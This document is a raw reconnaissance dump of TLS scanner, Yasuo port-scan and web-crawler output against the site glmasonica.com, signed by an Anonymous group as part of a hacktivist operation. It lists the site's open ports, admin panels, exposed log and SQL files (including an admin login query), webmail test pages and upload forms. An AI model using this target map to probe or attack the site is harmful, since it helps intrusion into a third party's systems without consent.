      Secure Renegotiation:              OK - Supported

  * Certificate - Content:
      SHA1 Fingerprint:                  a7aea2027082ba92402a9ea0fe1cb9cf36134a9f
      Common Name:                       server308.com
      Issuer:                            Let's Encrypt Authority X3
      Serial Number:                     036C4ABFF2559BE25A7E96F14E6764FEE474
      Not Before:                        Mar  4 07:30:28 2018 GMT
      Not After:                         Jun  2 07:30:28 2018 GMT
      Signature Algorithm:               sha256WithRSAEncryption
      Public Key Algorithm:              rsaEncryption
      Key Size:                          2048 bit
      Exponent:                          65537 (0x10001)
      X509v3 Subject Alternative Name:   {'DNS': ['server308.com', 'www.server308.com']}

  * Certificate - Trust:
      Hostname Validation:               FAILED - Certificate does NOT match glmasonica.com
      Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
      Java 6 CA Store (Update 65):       OK - Certificate is trusted
      Microsoft CA Store (09/2015):      OK - Certificate is trusted
      Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
      Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
      Certificate Chain Received:        ['server308.com', "Let's Encrypt Authority X3"]

  * Certificate - OCSP Stapling:
      NOT SUPPORTED - Server did not send back an OCSP response.

  * SSLV2 Cipher Suites:
      Server rejected all cipher suites.

  * Session Resumption:
      With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
      With TLS Session Tickets:          OK - Supported

  * SSLV3 Cipher Suites:
      Server rejected all cipher suites.


 SCAN COMPLETED IN 9.64 S
 ------------------------
Version: 1.11.11-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 192.252.149.45

Testing SSL server glmasonica.com on port 443 using SNI name glmasonica.com

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-SHA
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.1  256 bits  AES256-SHA
Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.1  128 bits  AES128-SHA
Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  server308.com
Altnames: DNS:server308.com, DNS:www.server308.com
Issuer:   Let's Encrypt Authority X3

Not valid before: Mar  4 07:30:28 2018 GMT
Not valid after:  Jun  2 07:30:28 2018 GMT

#######################################################################################################################################
  oooooo   oooo       .o.        .oooooo..o ooooo     ooo   .oooooo.
   `888.   .8'       .888.      d8P'    `Y8 `888'     `8'  d8P'  `Y8b
    `888. .8'       .88888.     Y88bo.       888       8  888      888
     `888.8'       .8' `888.     `ZY8888o.   888       8  888      888
      `888'       .88ooo8888.        `0Y88b  888       8  888      888
       888       .8'     `888.  oo     .d8P  `88.    .8'  `88b    d88'
      o888o     o88o     o8888o 88888888P'     `YbodP'     `Y8bood8P'
Welcome to Yasuo v2.3
Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
#######################################################################################################################################

I, [2018-04-15T22:48:14.755835 #20153]  INFO -- : Initiating port scan
I, [2018-04-15T22:55:51.933080 #20153]  INFO -- : Using nmap scan output file logs/nmap_output_2018-04-15_22-48-14.xml
I, [2018-04-15T22:55:51.972547 #20153]  INFO -- : Discovered open port: 192.252.149.45:80
I, [2018-04-15T22:55:53.785944 #20153]  INFO -- : Discovered open port: 192.252.149.45:443
I, [2018-04-15T22:55:57.648350 #20153]  INFO -- : Discovered open port: 192.252.149.45:993
I, [2018-04-15T22:56:01.484324 #20153]  INFO -- : Discovered open port: 192.252.149.45:995
I, [2018-04-15T22:56:05.310305 #20153]  INFO -- : <<<Enumerating vulnerable applications>>>
#######################################################################################################################################

Scan date: 15-4-2018 22:9:2
=======================================================================================================================================
| Domain: http://glmasonica.com/
| Server: Apache
| IP: 192.252.149.45
=======================================================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://glmasonica.com/admin/
| [+] CODE: 302 URL: http://glmasonica.com/ajax/
| [+] CODE: 200 URL: http://glmasonica.com/contact/
| [+] CODE: 200 URL: http://glmasonica.com/data/
| [+] CODE: 200 URL: http://glmasonica.com/cp/
| [+] CODE: 200 URL: http://glmasonica.com/faq/
| [+] CODE: 200 URL: http://glmasonica.com/index/
| [+] CODE: 200 URL: http://glmasonica.com/logs/
| [+] CODE: 200 URL: http://glmasonica.com/modules/
| [+] CODE: 200 URL: http://glmasonica.com/temp/
=======================================================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://glmasonica.com/admin/index.php
| [+] CODE: 200 URL: http://glmasonica.com/cp/rac/nsManager.cgi
| [+] CODE: 200 URL: http://glmasonica.com/faq.php
| [+] CODE: 200 URL: http://glmasonica.com/index.php
| [+] CODE: 200 URL: http://glmasonica.com/webmail/lib/emailreader_execute_on_each_page.inc.php
| [+] CODE: 200 URL: http://glmasonica.com/webmail/blank.html
| [+] CODE: 200 URL: http://glmasonica.com/webmail/horde/test.php
| [+] CODE: 200 URL: http://glmasonica.com/webmail/src/read_body.php
| [+] CODE: 200 URL: http://glmasonica.com/webmail/src/configtest.php
=======================================================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
======================================================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| [+] Max Requests: 15000
| [+] Crawling finished, 86011 URL's found!
|
| E-mails:
| [+] E-mail Found: glmasonica@intnet.mu
|
| PHPinfo() Disclosure:
|
| Timthumb:
|
| FCKeditor File Upload:
|
| File Upload Forms:
| [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.categories.add.tpl.html
| [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.membersimage.update.tpl.html
|
| External hosts:
| [+] External Host Found: https://cp.server308.com
|
| Web Backdoors:
|
| Source Code Disclosure:
|
| Ignored Files:
| http://glmasonica.com/data/sql/categories_add.sql
| http://glmasonica.com/data/sql/setup_maincategories.sql
| http://glmasonica.com/data/sql/z_cms_updateContentbyID.sql
| http://glmasonica.com/data/sql/cms_createContent.sql
| http://glmasonica.com/data/sql/cms_listPages.sql
| http://glmasonica.com/data/sql/cms_getPageData_all.sql
| http://glmasonica.com/data/sql/categories_list.sql
| http://glmasonica.com/data/sql/cms_getContent.sql
| http://glmasonica.com/data/sql/admin_login.sql
=======================================================================================================================================
 #####################################################################################################################################
                                            Anonymous JTSEC #OPkilluminatie full recon #18